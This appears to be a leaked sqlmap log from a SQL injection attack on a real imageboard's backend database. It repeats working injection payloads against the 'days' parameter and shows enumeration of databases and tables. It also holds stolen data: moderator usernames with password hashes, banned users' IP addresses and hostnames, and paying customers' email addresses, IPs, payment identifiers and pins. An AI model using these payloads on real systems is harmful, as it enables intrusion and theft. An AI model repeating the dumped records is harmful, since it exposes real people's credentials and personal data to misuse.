[*] menchi, $2y$10$fPihIotmttHUJS1IbxtWhuTqm0tZHMxphWW9A51/CbqJP4TRuyBlK
[*] Zorpheus, $2y$10$A7RkmqZQ3C6F2KRf63fmyeU9nAAF4a5bzYQ1kfClXhmL6bpZ109sG
[*] Kami, $2y$10$V0.a86y3Prg.4P7d44JLb.ncG1dV6AitnN34k8nZAdxTRaYhoB/9y
[*] invisibro, $2y$10$pipppAlhrDOo28LVx5TDxetkmeG/V6xXZ14m8bwH0Y12JCeJ50Y3e
[*] ABIB, $2y$10$kiAv9GzMxI97nlcxC4X4te9SBqasz9u8c.MoSc2Fv0KNbWxrUsDtm
[*] HotShot, $2y$10$7dN2KqP2haPHJrmrn2xsyucfsUJby5p53cXqKFI62TMb6wT4rsYxi
[*] Hox, $2y$10$VNMEKyG1.RVYu1T3/ff0beMy9Y9nZnVARDwenYN.FybNGTX6Pn3z2
[*] InspRedwood, $2y$10$4s3qj3qbSLO/IwwVWXNwXu94sC9krx07ABuF5QUAngg7bJCZz8jGO
[*] e7711, $2y$10$TQb9rMOz/r/zUxOZL8jYzOa8WZJBwa0Xrqn9usdTJrYp93UeCUwfi
[*] yournamehere, $2y$10$UH.4BxiiqWrszhaNWzfBte1eFXGuZdpefoVIqFrarOXRlRFrm4hYO
[*] Aerolite, $2y$10$0NhKEOJd79DiefNO4JHgVu/xo0BkIgjBR/x687EiQqgCfYc6Glt0q
[*] Heisenberg, $2y$10$VVCrqPmu.TjKOvTKjFXVjuyP24ccLfxPfyH1b6pzTdTHqvMg8jkmW
[*] VCR, $2y$10$/oY.jDXUcRzpEAN8xw8VpOe2Xeaz4sC1w3h0Bft6oXGFYKUf93LiW
[*] Beam, $2y$10$U8.y06BdEcfmtW8jD727gO2Fe5KMGydX.nQzqxuFIjy4ArdRS.yU2
[*] fsdfdsf, $2y$10$erGapgV6Ep3mlYaNXtceQemVqOUAey8.AY.oMPXpeOXPczw1xk02.
[*] RapeApe, $2y$10$FKqeC1YUjolPxvtS6pHpYOeL0Pnu7N.8.l3IHmspDRLELmu286rIW
[*] desuwa, $2y$10$IGcCUs.weewK.p.GDfBo0.L.DuBEm/WRGvAfcwlB1q4eFhVLFfNfy
[*] Tripon, $2y$10$Cp87dd7CvbZsiqfLsgqj/.q1uAW5F8E.0z59wCEceAqoKOjfBq426
[*] errorname457, $2y$10$TAZolewcLGqbJGjsIrloAe5IyGqR5rlMjNE6J2ANWTGXnwMwCM//W
[*] Cadfael, $2y$10$UN.WZNrGjhbAJHyFHEbRa.5FqL27pb4jjNHIuhZqHFhJREjZvwf92
[*] Spitch, $2y$10$1QkTbgrmFSy67ayIZOUcx.qfOoqwxaw2kJ42.SzoZnnNtTxrEpuci
[*] pixel, $2y$10$0GTByCWKATmBuwGAF8pMk.ZuG35Jkfwh0hl7cl4.s1l.v5q21IhwC
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'backend_admin'@'10.0.0.0/255.255.255.0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: backend
Table: users_sync
[2 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| user_data | text |
| user_id | varchar(255) |
+-----------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from blotter_messages [3]:
[*] 1130212800, moot, <span class="redtxt">Front page updated. *<a href="//www.4chan.org" target="_top">click</a>*
</span>, 1
[*] 1130212800, moot, 4chan DevBlog created. Be sure to check it out!
, 2
[*] 1130212800, moot, /f/ has been updated to allow/force the use of tags.
, 3
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from blotter_messages limt 3 order by id desc: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from blotter_messages order by id desc [3]:
[*] 1397310886, moot, Blog Post: <a href="http://blog.4chan.org/post/82477681005/upcoming-namespace-changes" target="_blank">Upcoming namespace changes</a>, 125
[*] 1396885858, moot, Blog Post: <a href="http://blog.4chan.org/post/81998248943/goodbye-to-some-old-friends" target="_blank">Goodbye to some old friends</a>, 124
[*] 1396803158, moot, Blog Post: <a href="http://blog.4chan.org/post/81896300203/webm-support-on-4chan" target="_blank">WebM support on 4chan</a>, 123
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from banned_users limit 1 [10]:
[*]
[*] 0
[*] 0000-00-00 00:00:00
[*] 173
[*] 2006-05-24 23:13:27
[*] 2006-05-29 00:24:39
[*] Anonymous
[*] expiration
[*] guro in /d/<>
[*] potatosan
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from banned_users where host='76.178.125.8' [2]:
[*] , 1, 2031491, 0, Aerolite, , int, 76.178.125.8, 2012-12-25 00:00:00, 259c98e9aa57cc20c1920525809d160d, Anonymous, 2012-12-22 00:20:31, , , 7352780, 0000-00-00 00:00:00, Complaining about 4chan (its policies, moderation, etc.) on the imageboards. The administrator will address your questions, comments, complaints, and concerns via e-mail. Constructive criticism and feedback should be posted to /q/.<>via ban template, ban requested by nikka, CPE-76-178-125-8.natsow.res.rr.com, global8, 0, , expiration, 2012-12-25 00:41:46, , 0
[*] , 0, 2328520, 0, Katsu, , int, 76.178.125.8, 2013-05-13 00:00:00, , Anonymous, 2013-05-10 23:56:49, , {"no":"10698300","sticky":"0","permasage":"0","closed":"0","permaage":"0","undead":"0","now":"05\/10\/13(Fri)21:55","name":"Anonymous","email":"","sub":"","com":">>10697027
is this what they , 10698300, 0000-00-00 00:00:00, /int/ only allows respectful discussion of other cultures.<>via ban template, ban requested by nikka, CPE-76-178-125-8.natsow.res.rr.com, int1, 57, , expiration, 2013-05-13 04:26:11, , 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users limit 1 [13]:
[*]
[*] 0
[*] 00009d0e7aba920ccca2f990e7cfcb91
[*] 00DZGKGJ6U
[*] 1
[*] 198.23.103.67
[*] 2013-10-09 22:18:18
[*] 2014-04-19 02:30:01
[*] 2014-10-09 22:18:18
[*] ch_1jeoAzqV0QfUL8
[*] GKLwaBHpTJsmk
[*] rytxbbc@gmail.com
[*] US
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users where token='L1GSD9FEVL': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users where payment_country='fr' [1]:
[*] cus_1iJjHqvdeFyCVT, jus.tr.yt@gmail.com, 0, 1, 1, 2014-04-25 13:24:09, , 0, 0, , 89.156.2.121, 0, 2014-04-19 08:48:34, FR, 2f1e10443f2321c95a518a3ba22b6dfb, CJNwaMgHs4VS6, 2013-04-25 13:24:09, FR, 89.156.2.121, 0, , , 0, ch_1iJjdovOUiHIxA, P4JDCJ7A9B
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select pin from pass_users where limit 1 [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select pin from pass_users limit 1: 'GKLwaBHpTJsmk'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
